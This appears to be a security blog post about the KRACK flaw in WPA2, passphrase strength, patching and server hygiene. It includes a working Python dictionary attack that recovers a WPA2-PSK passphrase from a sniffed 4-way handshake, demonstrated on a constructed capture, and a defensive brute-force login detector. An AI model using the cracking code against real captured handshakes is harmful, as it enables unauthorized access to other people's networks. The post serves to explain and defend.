The recent KRACK flaw in the WPA2 protocol is a reminder that all technology has a finite lifespan, intended or not, and you should not bet on any piece of it staying trustworthy for long.
Wireless Broken (Again)
WEP wireless security shipped with the original 802.11 standard in 1997 and was formally retired in 2004 when 802.11i arrived; WPA (2003) and then WPA2 (2004) replaced it. KRACK is not a leftover WEP flaw: it attacks the 4-way handshake that both WPA and WPA2 use, tricking a client into reinstalling an already-used key and resetting its nonce, so it will force either patches to WPA2 implementations or a successor (WPA3). Nor is WPA2 simply a certified WPA: WPA was an interim fix built around TKIP, while WPA2 mandates AES-CCMP.
WPA and WPA2 offer two encryption modes: TKIP, a stopgap built on the same RC4 cipher as WEP, which should not be used, and AES-CCMP, the stronger mode that WPA2 requires (AES is also the cipher approved for US Government use). With a strong cipher in place, the practical weakness of WPA2-Personal is the pre-shared key: anyone who captures the 4-way handshake can try passphrase guesses offline, at full speed and without touching your network again, so your WiFi passphrase must be long, random and unique. Do not use common or shared passwords, and make passwords as strong as the device allows. I personally use the 1Password Password Manager to generate strong passwords, and if you are feeling nerdy you can use the GRC Password Generator. https://howsecureismypassword.net/ gives a rough estimate of how long a brute force attack would take to recover a password; treat it as a guide only, and never type a password you actually use into a third-party site.
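To make the offline attack concrete, here is an added worked example (not code from the original post) that re-derives the WPA2-PSK key hierarchy the way a cracking tool does and runs a dictionary attack against a sniffed handshake. The capture, MAC addresses, nonces and wordlist are all constructed inline so it runs offline, and the cracking rate used for the time estimate is an assumed figure, not a measurement. It also shows why the guess rate is low (4096 PBKDF2 rounds per guess) and why length and randomness, not cipher choice, decide how long the attacker needs.

```python
"""WPA2-PSK offline dictionary attack against a sniffed 4-way handshake.

Added illustration, not code from the original post. The "capture" is
constructed locally with the same derivations an attacker reimplements, so the
script runs offline. Derivations follow IEEE 802.11i: PBKDF2-HMAC-SHA1 for the
PMK, PRF-512 for the PTK, HMAC-SHA1 MIC for key descriptor version 2 (CCMP).
The cracking rate used in the time estimate is an assumed figure, not a
measurement.
"""
import hashlib
import hmac

ASSUMED_GUESSES_PER_SECOND = 500_000  # assumed GPU rate; each guess costs 4096 PBKDF2 rounds


def pmk_from_passphrase(passphrase, ssid):
    """802.11i: PMK = PBKDF2(HMAC-SHA1, passphrase, SSID as salt, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key, label, data):
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || counter) until 64 bytes."""
    out = b""
    counter = 0
    while len(out) < 64:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs then min/max of the nonces)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """Key descriptor version 2 (WPA2/CCMP): MIC = first 16 bytes of HMAC-SHA1(KCK, EAPOL frame)."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def make_capture(passphrase, ssid):
    """Constructed capture of what a sniffer sees in handshake message 2 (no secrets in here)."""
    ap_mac = bytes.fromhex("001122334455")   # constructed BSSID
    sta_mac = bytes.fromhex("66778899aabb")  # constructed client MAC
    anonce = bytes(range(32))                # constructed nonces; real ones are random
    snonce = bytes(range(32, 64))
    # Constructed EAPOL-Key message 2 body with the 16-byte MIC field zeroed, as the MIC is computed.
    eapol = b"\x02\x03\x00\x5f\x02\x01\x0a" + b"\x00" * 8 + snonce + b"\x00" * 48
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def crack(capture, wordlist):
    """Offline attack: PMK -> PTK -> MIC per guess, compared with the sniffed MIC. No AP contact needed."""
    for guess in wordlist:
        pmk = pmk_from_passphrase(guess, capture["ssid"])
        kck = derive_ptk(pmk, capture["ap_mac"], capture["sta_mac"],
                         capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return guess
    return None


def seconds_to_exhaust(length, alphabet_size, rate=ASSUMED_GUESSES_PER_SECOND):
    """Worst-case seconds to try every passphrase of this length over this alphabet."""
    return alphabet_size ** length / rate


if __name__ == "__main__":
    capture = make_capture("sunshine1", "HomeWifi")
    print("recovered:", crack(capture, ["password", "letmein", "sunshine1", "qwerty"]))
    print("8 lowercase letters:", seconds_to_exhaust(8, 26) / 86400, "days")
    print("20 random alphanumerics:", seconds_to_exhaust(20, 62) / (86400 * 365), "years")
```

Two things to take from it: the SSID is the PBKDF2 salt, so a rainbow table only works for common network names, and nothing in the attack depends on the AP after the handshake is captured, so rate limiting on the router cannot help; only the passphrase's entropy does.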
What can you do to fix WiFi
- If you are using TKIP in WPA, use AES-CCMP instead. AES does not stop KRACK by itself, but against a TKIP (or GCMP) network the attack lets the attacker forge and inject packets, not just decrypt them.
- Check whether your WiFi router's manufacturer has released firmware that fixes the KRACK attack and install it. Then patch your clients too (laptops, phones, IoT devices): KRACK mainly targets the client side of the handshake, so a patched router alone does not protect you.
It is up to you to know the risk of each technology you use and to decide when to stop using it.
Support Windows
Most operating systems and web browsers have published support windows, but security protocols, encryption schemes and ciphers do not. Why?
Not just Wifi is Broken
As a developer, always assume things are insecure and prepare for the worst. Make sure brute force attacks are blocked: set up a firewall on your servers, run a security audit, and install software that bans IPs when repeated login failures are detected. Don't forget to set up a TLS (SSL) certificate (read my Let's Encrypt guide here), and if you want extra security read here about public key pinning for your certificate.
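The "ban IPs when brute force attacks happen" step is a simple sliding-window count per source address. The following is an added example (not code from the original post and not any particular product's logic) that runs that detection over a few constructed sshd-style log lines; the threshold, window and year used for timestamp parsing are assumed policy values, and actually applying the ban with a firewall rule is left to the caller.

```python
"""Brute force login detection over auth log lines, producing a ban list.

Added illustration, not code from the original post or from any product.
The log lines are constructed in the style of OpenSSH's sshd messages; the
threshold, window and year are assumed values. Applying the ban (for example
with a firewall rule) is left to the caller.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# syslog timestamps carry no year, so one is assumed for parsing
ASSUMED_YEAR = 2017

FAILED_LOGIN_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?\S+ from (?P<ip>[\d.]+) port \d+"
)

# Constructed sample log: one attacker hammering root/admin, one legitimate user with slow typos.
SAMPLE_LOG = """\
Oct 16 10:00:01 web1 sshd[1201]: Failed password for root from 203.0.113.7 port 51022 ssh2
Oct 16 10:00:03 web1 sshd[1203]: Failed password for invalid user admin from 203.0.113.7 port 51024 ssh2
Oct 16 10:00:05 web1 sshd[1205]: Failed password for root from 203.0.113.7 port 51026 ssh2
Oct 16 10:00:07 web1 sshd[1207]: Failed password for root from 203.0.113.7 port 51028 ssh2
Oct 16 10:00:09 web1 sshd[1209]: Failed password for root from 203.0.113.7 port 51030 ssh2
Oct 16 10:01:00 web1 sshd[1211]: Accepted publickey for deploy from 198.51.100.4 port 40001 ssh2
Oct 16 10:05:00 web1 sshd[1213]: Failed password for deploy from 198.51.100.4 port 40002 ssh2
Oct 16 10:30:00 web1 sshd[1215]: Failed password for deploy from 198.51.100.4 port 40003 ssh2
"""


def parse_failed_login(line):
    """Return (timestamp, source_ip) for a failed-password line, or None for anything else."""
    match = FAILED_LOGIN_RE.match(line)
    if not match:
        return None
    ts = datetime.strptime(f"{ASSUMED_YEAR} {match.group('ts')}", "%Y %b %d %H:%M:%S")
    return ts, match.group("ip")


def find_brute_forcers(lines, max_failures=5, window_seconds=600):
    """Sliding-window failure count per source IP.

    Returns {ip: time_the_threshold_was_crossed}. Failures older than the
    window are dropped, so a user who mistypes twice an hour is never banned.
    """
    recent = defaultdict(deque)
    banned = {}
    for line in lines:
        parsed = parse_failed_login(line)
        if parsed is None:
            continue
        ts, ip = parsed
        if ip in banned:
            continue
        window = recent[ip]
        window.append(ts)
        while window and (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= max_failures:
            banned[ip] = ts
    return banned


if __name__ == "__main__":
    for ip, when in find_brute_forcers(SAMPLE_LOG.splitlines()).items():
        print(f"ban {ip} (threshold crossed at {when.time()})")
```

The window matters as much as the threshold: without it, the legitimate user's occasional failures accumulate forever and eventually trigger a ban. For real deployments, also log the ban decision itself so you can audit false positives, and exempt your own management addresses from the rule.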
You can deploy a server in the cloud for as little as $2.50 a month (guide here) on Vultr, or set up a server on Digital Ocean (first 2 months are free); read my setup guide here.
Deprecation of libraries and code
Software developers are all too familiar with the deprecation of libraries and code. Recently I had to switch from the mysql_connect routines that were deprecated in PHP 5.5; luckily mysqli_connect was available, so it was not a real problem, and mysqli brings prepared statements, which the old mysql_* functions never had.
Having to switch technology to a faster and/or more secure version is a win-win IMHO.
Backup
What's your backup plan? Don't forget you can easily back up with rsync. There is no excuse for not backing up your data, and no backup counts until you have tested a restore from it.
Git
You should also use source code repositories like GitHub or BitBucket to manage code versions and to restore environments when things go bad.
Social Media
Hashtags are also a great way to stay up to date on exploits (#KRACK, #vuln, #CVE etc).
Handy links
Read more on attacker tactics, techniques and common knowledge (MITRE ATT&CK).
Read the OWASP guide to pick up software security best practices.
Stay safe: Research, Secure and Backup.
More Soon.
Revision History
v1.1 Added support windows.